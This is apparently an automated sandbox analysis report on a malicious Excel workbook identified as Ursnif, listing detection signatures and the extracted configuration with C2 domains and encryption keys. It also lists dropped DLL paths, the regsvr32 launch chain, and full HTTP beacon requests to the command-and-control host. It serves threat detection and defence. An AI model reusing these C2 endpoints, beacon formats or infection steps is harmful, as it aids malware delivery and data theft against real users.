Windows Analysis Report documentation_39236.xlsb

Overview

General Information

Sample Name: documentation_39236.xlsb
Analysis ID: 445916
MD5: 31ed7b3f7d7173afe801858e30c0fb62
SHA1: 40376b923682dc858806071f97cb64f781142dbb
SHA256: 8081a3a7be80c197b850d2c1e3cac75944d3fb55fda2b312815f565616366843
Infos:

Most interesting Screenshot:

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Found malware configuration
Multi AV Scanner detection for domain / URL
Sigma detected: Encoded IEX
Sigma detected: Office product drops executable at suspicious location
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Ursnif
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Office process drops PE file
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Mshta Spawning Windows Shell
Sigma detected: Suspicious Csc.exe Source File Folder
Suspicious powershell command line found
Writes or reads registry keys via WMI
Writes registry values via WMI
Abnormal high CPU Usage
Compiles C# or VB.Net code
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain checking for process token information
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Registers a DLL
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Tries to load missing DLLs
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Xls With Macro 4.0

Classification

AV Detection:

barindex
Found malware configuration
Source: 00000003.00000003.266469751.0000000000530000.00000040.00000001.sdmp Malware Configuration Extractor: Ursnif {"lang_id": "RU, CN", "RSA Public Key": "48n489DADvQETiNETBHyPBGGvRa6csWtqIuLSVOWYWKKC10mrbaCDTGmXT9+yBdCxu5rsz9H10sEVOKS1YbQqCSO7vHhJ4AqplAi0EpahHSG6iAjqlB8Ka8e19eFq+oWTyXFXNaCOa1ztfMCxuyaqADn0yfjtWeuipBCZ+WgBEXPEGD6cctVIddqMNHa0kzmsNtadDWoPRLlm3WMxbPQCRP0dzRx5jDY+C8wai2SJ7DJITIcBRF1En7YoFGFEsOcJvmCr4+vI12IDpy+U6ARTXUjcxKOcCsi8f3JnvpXpMyaus8R6AAz7bUHl5rTZsgEcjzMHpe+df4LlMvsTqR94H38v4JAsBa+Wcc33Pvxw/o=", "c2_domain": ["gtr.antoinfer.com", "app.bighomegl.at"], "botnet": "1500", "server": "580", "serpent_key": "OkOYg3xmZhahWmvv", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "10"}
Multi AV Scanner detection for domain / URL
Source: gtr.antoinfer.com Virustotal: Detection: 7% Perma Link

Cryptography:

barindex
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_001E39C5 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError, 3_2_001E39C5
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 19_2_00FB39C5 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError, 19_2_00FB39C5
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File opened: C:\Windows\SysWOW64\MSVCR100.dll Jump to behavior
Source: unknown HTTPS traffic detected: 162.241.253.78:443 -> 192.168.2.3:49725 version: TLS 1.2
Source: Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 0000002F.00000002.582791755.000001E9AE630000.00000002.00000001.sdmp, csc.exe, 00000030.00000002.583021854.0000021D92B10000.00000002.00000001.sdmp
Source: Binary string: mscorlib.pdb source: csc.exe, 0000002F.00000002.590444392.000001E9B11EC000.00000002.00000001.sdmp
Source: Binary string: c:\Reply-quite\Cry_Country\523\Gave\Color\shape.pdb source: app[1].dll.1.dr

Software Vulnerabilities:

barindex
Document exploit detected (creates forbidden files)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\app[1].dll Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\Public\Documents\decrypt.dll Jump to behavior
Document exploit detected (drops PE files)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: app[1].dll.1.dr Jump to dropped file
Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Section loaded: unknown origin: URLDownloadToFileA Jump to behavior
Document exploit detected (process start blacklist hit)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\regsvr32.exe

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49755 -> 165.232.183.49:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49755 -> 165.232.183.49:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49757 -> 165.232.183.49:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49757 -> 165.232.183.49:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49759 -> 165.232.183.49:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49760 -> 165.232.183.49:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49760 -> 165.232.183.49:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49762 -> 165.232.183.49:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49762 -> 165.232.183.49:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49761 -> 165.232.183.49:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49761 -> 165.232.183.49:80
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: ALLEGHENYHEALTHNETWORKUS ALLEGHENYHEALTHNETWORKUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic HTTP traffic detected: GET /7lD6H27N_2/BPcjmtAv0Zw4YWBW5/_2Fxf1uK6WCO/_2Fjr90UDnf/fvsahgiWLN_2Bo/Vmn_2FfIBHwVISTOJqyyE/yxzQpB4UhTtBihgn/15wt67RuhdWC2bp/AA4QTb7hSSc7ibwOLz/pdYBrbn9P/IhNkxf132wscOBr5M107/x3K_2BnAOaEK3ZrGH_2/BhQbh5Iq3KL0HGqeYocdUa/aitTSocVb3Ei8/K8Yn7wxH/8ZzNnAARdlf1lpPkD_2FTSI/88hMX1xgXx/WKheFQm4ijbivR_2F/Zqk2tiAD1SrE/7_2FLrw5q4N/ROSXMe9TmWNzIt/lpE2Vas7vRgwYKuDJRzfN/M8anWcq HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: gtr.antoinfer.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: gtr.antoinfer.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xFDxUxdbnv/F6OYsZZ54L9nW_2Fn/67TmggSh_2FJ/XC_2BJ4ptUf/_2Bn4_2BufrBke/X9TaUVAWE43KR_2BAaOOd/VFdvQg3iI5nNB7ro/WwH2QRd3S4Jpyvs/BAGj3S8XfXokbtiE7i/hiopX3wKc/HclUJ6ir4iZ2Wbahh_2F/U4T4cSpeeoulqiraG2L/OcnB_2BpDFDp4gpBC5Tkhs/w68xYDIGC4qQh/4p7XqKDy/ZmjFv4NCLUhiS0t8WoyKwxb/hab8TjugII/SNATkC5REfp7kWCrA/g3JBPajXKX1i/qwbd_2FPu7J/lLmh_2BCbPNt2x/W33zXC7gkL52CnQJHgKW5/o596c7z HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: gtr.antoinfer.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /k_2Bld_2B868iR7p/iSLerqiJRFRfRPj/I3sykOYq_2B_2BHlkm/lN1n6_2F_/2BoCebPKrVZFk5Ykbc8d/ir2ifxTr4LNwVXB57AO/naMzNC0NRqAZpafqf_2BA_/2Be4kMQ_2Bs4v/p3vimkya/tnJRXZOQhgPrD4eJIIoOBmz/6_2FqS0VmH/GdEp4ZZJMOcj3fIll/Gr7XyTEKPabp/aWzveP_2B5R/CbkrZ6KMbYewce/4JBfvb8ftJcY5XJZOep1x/uKyVwvTYfdKUGuNG/Emm_2BOgQKRpwFp/DFm1TypwhIB6euZx4o/ZnwoOdebK/P2zkNdJ1mC1FOPRaBbHj/tGtvylAtqDtqZZGz2/K HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: gtr.antoinfer.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: gtr.antoinfer.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /MpeUKSeGn_2/Bk4DEtluQu8Y9R/36MpR_2BhUMN_2FXN2dO6/hANnmINzHP5reb6i/6KJxoqvLxdOtysJ/n0kMUo2t6MOWkWv9fh/vWxI1agPy/wQGFAQHZyVrGmWgCFodY/7FxYiI_2B53c0enExOR/GrTPqZ6XXPPo3SV3TEozm4/Exzy5YwFrUkYs/bQh_2FMD/0GOF4z17cCRm_2Fd6CEZwMn/XbmChIoDCR/BVkOjJKAuaNi81j2s/DAsZ7IX3Y_2F/9MNFRd8bZDE/rF3vDAxY3XVSH_/2BRf6xlnVaI7w67ANQeYN/HlP9zkWlJUqCL5u9/iWI0VgGL0n3Ke_2/BO2nUtcdX/UZ97 HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: gtr.antoinfer.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /IW0KvL6zqxcwdal5Ue/sV05YuqDL/CUY_2FYXWgTEAN2MleRL/cOthmAfIFOrxcxXsh59/7AJjgFXMm7GK3zI8vuZf8x/2APU8PDwtmpAr/ANYuz5rb/u_2Ba0GWu8ipmpUp8uWalIe/b1DgDagPuJ/QMf4e8CmCgrJh1KOA/BEoe0WcWQ2Nu/avlRE03_2BA/ikzAyiPbN_2BHy/_2BYBLI5BgaFwR91PIKzH/SJ1rXSKpXvP3w4_2/BgNlAxmgSpCbzA3/rA6BVOnt_2Fs0ge7Ub/mZV_2ByZe/27QR_2F_2BkAwlW65Zcm/dBBVfaC3K9GAjFa76dp/yXioP6kRbgfKWsmcnd8JPP/othn HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: gtr.antoinfer.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /h_2F93afXj4zv0agU5uGcex/4RttysT472/M4H0F6I1ZWhRsl9Mq/gKfk1C7c8_2F/gareL3qIHQG/CB4JNANcQf7aA7/T_2FdtzxTEW5qEGgXi5de/wQDU_2FVQ9AqPhgZ/QBiqWLaZem_2BhU/Ub_2Bbrgr7V1ABDC_2/FRiGY94s4/Mw6BG5UCBUeOPfAvsqhw/LTDXh6l0kPjcKC2fY3f/eXzxQUf3im0jBAcOxzjmlM/t_2BlYZFFpOnU/rPHW4IFe/pXsS9omB7zF_2B_2BEp_2BV/Ya9nAT6p4X/2ixawH6C4M4LLI7hR/_2BGNe0TQDy_/2FBKn745niy/_2BRADxlO6wxP1/zz_2BWqAzRaI/gWg HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: gtr.antoinfer.comConnection: Keep-Alive
Source: msapplication.xml0.23.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x356d8606,0x01d7744b</date><accdate>0x356d8606,0x01d7744b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml0.23.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x356d8606,0x01d7744b</date><accdate>0x356d8606,0x01d7744b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml5.23.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x35752726,0x01d7744b</date><accdate>0x35752726,0x01d7744b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml5.23.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x35752726,0x01d7744b</date><accdate>0x35752726,0x01d7744b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml7.23.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x35752726,0x01d7744b</date><accdate>0x35752726,0x01d7744b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml7.23.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x35752726,0x01d7744b</date><accdate>0x35752726,0x01d7744b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: unknown DNS traffic detected: queries for: free.mynowministries.com
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 08 Jul 2021 13:46:50 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
Source: powershell.exe, 00000027.00000002.587349219.000002B5AD3CF000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: {5DCD6FF8-E03E-11EB-90E4-ECF4BB862DED}.dat.23.dr, ~DF99BD870E81A4914B.TMP.23.dr String found in binary or memory: http://gtr.antoinfer.com/7lD6H27N_2/BPcjmtAv0Zw4YWBW5/_2Fxf1uK6WCO/_2Fjr90UDnf/fvsahgiWLN_2Bo/Vmn_2F
Source: regsvr32.exe, 00000003.00000002.590086971.0000000002FD0000.00000002.00000001.sdmp, regsvr32.exe, 00000013.00000002.585926396.0000000003640000.00000002.00000001.sdmp, powershell.exe, 00000025.00000002.586261985.0000028656DD0000.00000002.00000001.sdmp, powershell.exe, 00000027.00000002.585702910.000002B5ABD70000.00000002.00000001.sdmp, csc.exe, 0000002F.00000002.583539215.000001E9AEB40000.00000002.00000001.sdmp, csc.exe, 00000030.00000002.583966297.0000021D92F30000.00000002.00000001.sdmp String found in binary or memory: http://gtr.antoinfer.com/IW0KvL6zqxcwdal5Ue/sV05YuqDL/CUY_2FYXWgTEAN2MleRL/cOthmAfIFOrxcxXsh59/
Source: {7879BAAA-E03E-11EB-90E4-ECF4BB862DED}.dat.28.dr, ~DF4AB9BBFB5CFFE773.TMP.28.dr String found in binary or memory: http://gtr.antoinfer.com/IW0KvL6zqxcwdal5Ue/sV05YuqDL/CUY_2FYXWgTEAN2MleRL/cOthmAfIFOrxcxXsh59/7AJjg
Source: {7879BAA8-E03E-11EB-90E4-ECF4BB862DED}.dat.28.dr String found in binary or memory: http://gtr.antoinfer.com/MpeUKSeGn_2/Bk4DEtluQu8Y9R/36MpR_2BhUMN_2FXN2dO6/hANnmINzHP5reb6i/6KJxoqvLx
Source: regsvr32.exe, 00000003.00000002.590086971.0000000002FD0000.00000002.00000001.sdmp, regsvr32.exe, 00000013.00000002.585926396.0000000003640000.00000002.00000001.sdmp, powershell.exe, 00000025.00000002.586261985.0000028656DD0000.00000002.00000001.sdmp, powershell.exe, 00000027.00000002.585702910.000002B5ABD70000.00000002.00000001.sdmp, csc.exe, 0000002F.00000002.583539215.000001E9AEB40000.00000002.00000001.sdmp, csc.exe, 00000030.00000002.583966297.0000021D92F30000.00000002.00000001.sdmp String found in binary or memory: http://gtr.antoinfer.com/h_2F93afXj4zv0agU5uGcex/4RttysT472/M4H0F6I1ZWhRsl9Mq/gKfk1C7c8_2F/gare
Source: {7879BAAC-E03E-11EB-90E4-ECF4BB862DED}.dat.28.dr String found in binary or memory: http://gtr.antoinfer.com/h_2F93afXj4zv0agU5uGcex/4RttysT472/M4H0F6I1ZWhRsl9Mq/gKfk1C7c8_2F/gareL3qIH
Source: {7879BAA6-E03E-11EB-90E4-ECF4BB862DED}.dat.28.dr, ~DFA7B5BF1FB774EA36.TMP.28.dr String found in binary or memory: http://gtr.antoinfer.com/k_2Bld_2B868iR7p/iSLerqiJRFRfRPj/I3sykOYq_2B_2BHlkm/lN1n6_2F_/2BoCebPKrVZFk
Source: {7879BAA4-E03E-11EB-90E4-ECF4BB862DED}.dat.28.dr, ~DF436C4ACF406520B7.TMP.28.dr String found in binary or memory: http://gtr.antoinfer.com/xFDxUxdbnv/F6OYsZZ54L9nW_2Fn/67TmggSh_2FJ/XC_2BJ4ptUf/_2Bn4_2BufrBke/X9TaUV
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: powershell.exe, 00000025.00000002.594457896.000002865866F000.00000004.00000001.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: csc.exe, 0000002F.00000002.586905440.000001E9B0DB0000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authentication
Source: csc.exe, 0000002F.00000002.586905440.000001E9B0DB0000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecisionzhttp://schemas.xmlsoap.o
Source: csc.exe, 0000002F.00000002.586905440.000001E9B0DB0000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthrhttp://schemas.xmlsoap.org/ws/2005
Source: csc.exe, 0000002F.00000002.586905440.000001E9B0DB0000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid
Source: csc.exe, 0000002F.00000002.586905440.000001E9B0DB0000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressxhttp://schemas.xmlsoap.org/ws/200
Source: csc.exe, 0000002F.00000002.586905440.000001E9B0DB0000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/locality
Source: csc.exe, 0000002F.00000002.586905440.000001E9B0DB0000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/mobilephone
Source: powershell.exe, 00000025.00000002.587720869.0000028658461000.00000004.00000001.sdmp, powershell.exe, 00000027.00000002.589665519.000002B5AD541000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: csc.exe, 0000002F.00000002.586905440.000001E9B0DB0000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier
Source: csc.exe, 0000002F.00000002.586905440.000001E9B0DB0000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/otherphone
Source: csc.exe, 0000002F.00000002.586905440.000001E9B0DB0000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/postalcoderhttp://schemas.xmlsoap.org/ws/2005/
Source: csc.exe, 0000002F.00000002.586905440.000001E9B0DB0000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovince
Source: csc.exe, 0000002F.00000002.586905440.000001E9B0DB0000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddresszhttp://schemas.xmlsoap.org/ws/20
Source: csc.exe, 0000002F.00000002.586905440.000001E9B0DB0000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprintrhttp://schemas.xmlsoap.org/ws/2005/
Source: csc.exe, 0000002F.00000002.586905440.000001E9B0DB0000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishednamejhttp://schemas.xmlsoap.o
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: msapplication.xml.23.dr String found in binary or memory: http://www.amazon.com/
Source: powershell.exe, 00000025.00000002.594457896.000002865866F000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: msapplication.xml1.23.dr String found in binary or memory: http://www.google.com/
Source: msapplication.xml2.23.dr String found in binary or memory: http://www.live.com/
Source: msapplication.xml3.23.dr String found in binary or memory: http://www.nytimes.com/
Source: msapplication.xml4.23.dr String found in binary or memory: http://www.reddit.com/
Source: msapplication.xml5.23.dr String found in binary or memory: http://www.twitter.com/
Source: msapplication.xml6.23.dr String found in binary or memory: http://www.wikipedia.com/
Source: msapplication.xml7.23.dr String found in binary or memory: http://www.youtube.com/
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://api.aadrm.com/
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://api.addins.store.office.com/app/query
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://api.cortana.ai
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://api.diagnostics.office.com
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://api.diagnosticssdf.office.com
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://api.microsoftstream.com/api/
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://api.office.net
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://api.onedrive.com
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://apis.live.net/v5.0/
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://augloop.office.com
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://augloop.office.com/v2
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://autodiscover-s.outlook.com/
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://cdn.entity.
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://clients.config.office.net/
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
